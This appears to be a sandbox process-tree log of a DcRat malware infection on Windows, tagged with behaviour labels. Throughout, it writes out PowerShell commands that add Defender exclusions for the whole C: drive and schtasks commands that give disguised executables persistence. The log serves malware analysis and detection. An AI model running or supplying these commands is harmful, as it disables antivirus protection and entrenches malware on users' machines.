C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFEB.tmp" "c:\Windows\IdentityCRL\INT\CSCFB022689F64F454281863A9528E616A9.TMP"7⤵PID:4200
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yqjigaoq\yqjigaoq.cmdline"6⤵PID:788
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7.tmp" "c:\Program Files\Java\jdk-1.8\include\win32\bridge\CSCCEEF9AE666D44A6AA9B3F0F2E3156C68.TMP"7⤵PID:5664
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ymqbsffj\ymqbsffj.cmdline"6⤵PID:5688
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B1.tmp" "c:\Program Files\Windows NT\TableTextService\en-US\CSCAC9DC3C362B842389DD27FC647DBA81.TMP"7⤵PID:5576
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nbooucgh\nbooucgh.cmdline"6⤵PID:5512
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES29B.tmp" "c:\winNet\CSC914BA3B3B01C4F879879E38F9C9BAD6.TMP"7⤵PID:5828
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3tbqmpqn\3tbqmpqn.cmdline"6⤵PID:5728
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A8.tmp" "c:\Program Files\Microsoft Office\PackageManifests\CSCFD452B96B27B47E1B15A37F3D0011BC.TMP"7⤵PID:5848
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0tly5dnr\0tly5dnr.cmdline"6⤵
- Drops file in System32 directory
PID:6040 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74E.tmp" "c:\Windows\System32\CSC6EDE1823CE8C44998F71C1B5779EF3EF.TMP"7⤵PID:6084
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:2016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Config.Msi/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msiexec.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:1476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:1388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gyw7YfgZit.bat"6⤵PID:5552
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:3672
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:1384
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:5744
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\winNet\winlogon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\winNet\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\winNet\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2476
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Users\Default\SendTo\sppsvc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1384
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default\SendTo\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Default\SendTo\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\Registry.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\Registry.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\Registry.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1440
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2320
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1712
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\winNet\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\winNet\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\winNet\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:988
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3360
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1080
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\winNet\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2180
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 72D546C1C009FBAD33D0C62C335D404B2⤵
- Loads dropped DLL
PID:5196
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D7827AE264A1B4E54F8084EDAAD5B4C72⤵
- Loads dropped DLL
PID:5364
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 29076F552ABCCBE5E901A67AAD367FC1 E Global\MSI00002⤵
- Loads dropped DLL
PID:5556 -
C:\Windows\SysWOW64\wevtutil.exe"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"3⤵PID:5884
-
C:\Windows\System32\wevtutil.exe"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow644⤵PID:5832
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4568
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4632
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2064
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5272
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5996
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5152
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2692
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5772
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5912
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4972
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5604
-
C:\winNet\explorer.exeC:\winNet\explorer.exe1⤵
- Executes dropped EXE
PID:4568 -
C:\winNet\explorer.exe.exe"C:\winNet\explorer.exe.exe"2⤵
- Executes dropped EXE
PID:5740
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:2692
-
-
C:\Users\Default\SendTo\sppsvc.exeC:\Users\Default\SendTo\sppsvc.exe1⤵
- Executes dropped EXE
PID:5364 -
C:\Users\Default\SendTo\sppsvc.exe.exe"C:\Users\Default\SendTo\sppsvc.exe.exe"2⤵
- Executes dropped EXE
PID:2652
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:2932
-
-
C:\Program Files\Internet Explorer\Registry.exe"C:\Program Files\Internet Explorer\Registry.exe"1⤵
- Executes dropped EXE
PID:3696 -
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:4724
-
-
C:\Program Files\Internet Explorer\Registry.exe.exe"C:\Program Files\Internet Explorer\Registry.exe.exe"2⤵
- Executes dropped EXE
PID:3004
-
-
C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe"C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe"1⤵
- Executes dropped EXE
PID:4660 -
C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe"C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe"2⤵
- Executes dropped EXE
PID:3156
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:4252
-
-
C:\winNet\csrss.exeC:\winNet\csrss.exe1⤵
- Executes dropped EXE
PID:2012 -
C:\winNet\csrss.exe.exe"C:\winNet\csrss.exe.exe"2⤵
- Executes dropped EXE
PID:3220
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:5964
-
-
C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe"C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe"1⤵
- Executes dropped EXE
PID:484 -
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:2960
-
-
C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe"C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe"2⤵
- Executes dropped EXE
PID:5172
-
-
C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe"C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe"1⤵
- Executes dropped EXE
PID:1296 -
C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe"C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe"2⤵
- Executes dropped EXE
PID:1140
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:3728
-
-
C:\Users\Admin\AppData\Local\msiexec.exeC:\Users\Admin\AppData\Local\msiexec.exe1⤵
- Executes dropped EXE
PID:5488
-
C:\Windows\IdentityCRL\INT\backgroundTaskHost.exeC:\Windows\IdentityCRL\INT\backgroundTaskHost.exe1⤵
- Executes dropped EXE
PID:5444 -
C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe.exe"C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe.exe"2⤵
- Executes dropped EXE
PID:1916
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:3908
-
-
C:\winNet\explorer.exeC:\winNet\explorer.exe1⤵
- Executes dropped EXE
PID:5164 -
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:2012
-
-
C:\winNet\explorer.exe.exe"C:\winNet\explorer.exe.exe"2⤵
- Executes dropped EXE
PID:1100
-
-
C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe"C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe"1⤵
- Executes dropped EXE
PID:4008 -
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:5444
-
-
C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe.exe"C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe.exe"2⤵
- Executes dropped EXE
PID:2652
-
-
C:\winNet\winlogon.exeC:\winNet\winlogon.exe1⤵
- Executes dropped EXE
PID:5956 -
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:3100
-
-
C:\winNet\winlogon.exe.exe"C:\winNet\winlogon.exe.exe"2⤵
- Executes dropped EXE
PID:5032
-
-
C:\Users\Default\SendTo\sppsvc.exeC:\Users\Default\SendTo\sppsvc.exe1⤵
- Executes dropped EXE
PID:720 -
C:\Users\Default\SendTo\sppsvc.exe.exe"C:\Users\Default\SendTo\sppsvc.exe.exe"2⤵
- Executes dropped EXE
PID:4972
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:4576
-
-
C:\Program Files\Internet Explorer\Registry.exe"C:\Program Files\Internet Explorer\Registry.exe"1⤵
- Executes dropped EXE
PID:132 -
C:\Program Files\Internet Explorer\Registry.exe.exe"C:\Program Files\Internet Explorer\Registry.exe.exe"2⤵
- Executes dropped EXE
PID:1956
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:1888
-
-
C:\DriversavessessionDlldhcp\Roblox.exeC:\DriversavessessionDlldhcp\Roblox.exe1⤵
- Executes dropped EXE
PID:3156
-
C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe"C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe"1⤵
- Executes dropped EXE
PID:4784 -
C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe"C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe"2⤵
- Executes dropped EXE
PID:4948
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:5312
-
-
C:\winNet\csrss.exeC:\winNet\csrss.exe1⤵
- Executes dropped EXE
PID:5856 -
C:\winNet\csrss.exe.exe"C:\winNet\csrss.exe.exe"2⤵
- Executes dropped EXE
PID:1992
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵PID:1388
-
-
C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe"C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe"1⤵
- Executes dropped EXE
PID:3364 -
C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe"C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe"2⤵PID:572
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵PID:5656
-
-
C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe"C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe"1⤵PID:5928
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵PID:5340
-
-
C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe"C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe"2⤵PID:5280
-
-
C:\Users\Admin\AppData\Local\msiexec.exeC:\Users\Admin\AppData\Local\msiexec.exe1⤵PID:5016
-
C:\winNet\explorer.exeC:\winNet\explorer.exe1⤵PID:2652
-
C:\winNet\explorer.exe.exe"C:\winNet\explorer.exe.exe"2⤵PID:2976
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵PID:4116
-
-
C:\Program Files\Internet Explorer\Registry.exe"C:\Program Files\Internet Explorer\Registry.exe"1⤵PID:2356
-
C:\Program Files\Internet Explorer\Registry.exe.exe"C:\Program Files\Internet Explorer\Registry.exe.exe"2⤵PID:2708
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵PID:6084
-
-
C:\Users\Default\SendTo\sppsvc.exeC:\Users\Default\SendTo\sppsvc.exe1⤵PID:5912
-
C:\Users\Default\SendTo\sppsvc.exe.exe"C:\Users\Default\SendTo\sppsvc.exe.exe"2⤵PID:4288
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵PID:3976
-
-
C:\Windows\IdentityCRL\INT\backgroundTaskHost.exeC:\Windows\IdentityCRL\INT\backgroundTaskHost.exe1⤵PID:2460
-
C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe.exe"C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe.exe"2⤵PID:2000
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵PID:4624
-
-
C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe"C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe"1⤵PID:3312
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵PID:4376
-
-
C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe"C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe"2⤵PID:6056
-
-
C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe"C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe"1⤵PID:5572
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵PID:1296
-
-
C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe"C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe"2⤵PID:3884
-
-
C:\winNet\csrss.exeC:\winNet\csrss.exe1⤵PID:5900
-
C:\winNet\csrss.exe.exe"C:\winNet\csrss.exe.exe"2⤵PID:5280
